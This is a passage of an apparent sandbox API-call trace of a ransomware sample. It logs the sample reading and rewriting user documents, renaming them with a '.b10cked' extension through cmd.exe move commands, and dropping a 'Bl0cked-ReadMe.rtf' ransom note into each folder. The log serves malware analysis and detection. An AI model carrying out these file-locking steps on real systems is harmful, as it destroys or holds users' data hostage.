out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.842] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0137.842] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.842] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.843] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xe8c, dwThreadId=0xd94)) returned 1 [0137.855] CloseHandle (hObject=0x110) returned 1 [0137.855] CloseHandle (hObject=0x114) returned 1 [0137.855] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0137.856] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.856] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.856] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.856] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.856] ReleaseMutex (hMutex=0xf8) returned 1 [0137.856] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.856] ReleaseMutex (hMutex=0xf8) returned 1 [0137.856] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.856] ReleaseMutex (hMutex=0xf8) returned 1 [0137.856] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.856] ReleaseMutex (hMutex=0xf8) returned 1 [0137.856] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\VBKNjIyz39y.ods" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\vbknjiyz39y.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.856] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19464553699) returned 1 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.858] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.858] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x14334 [0137.858] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.858] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.858] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1481c [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1481c [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.859] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa40d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa40d, lpOverlapped=0x0) returned 1 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.859] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa40d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa40d, lpOverlapped=0x0) returned 1 [0137.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=-41997, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa40f [0137.860] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa40d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa40d, lpOverlapped=0x0) returned 1 [0137.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=-41997, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa40f [0137.860] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa40d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa40d, lpOverlapped=0x0) returned 1 [0137.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBKNjIyz39y.ods", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBKNjIyz39y.ods", cchWideChar=15, lpMultiByteStr=0x131322c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBKNjIyz39y.ods", lpUsedDefaultChar=0x0) returned 15 [0137.864] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1481c [0137.864] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.864] CloseHandle (hObject=0x114) returned 1 [0137.865] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\VBKNjIyz39y.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS") returned 0x2f [0137.866] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0137.866] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xdbc, dwThreadId=0xde0)) returned 1 [0137.876] CloseHandle (hObject=0x110) returned 1 [0137.876] CloseHandle (hObject=0x114) returned 1 [0137.876] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0137.876] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.876] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 3 [0137.876] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0137.876] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.876] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.876] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.876] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.876] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.876] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0137.877] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.877] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.877] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd90, dwThreadId=0xda8)) returned 1 [0138.028] CloseHandle (hObject=0x110) returned 1 [0138.028] CloseHandle (hObject=0x114) returned 1 [0138.028] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0x20 [0138.028] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.028] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.028] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.028] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.028] ReleaseMutex (hMutex=0xf8) returned 1 [0138.028] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.028] ReleaseMutex (hMutex=0xf8) returned 1 [0138.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.029] ReleaseMutex (hMutex=0xf8) returned 1 [0138.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.029] ReleaseMutex (hMutex=0xf8) returned 1 [0138.029] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19481823206) returned 1 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 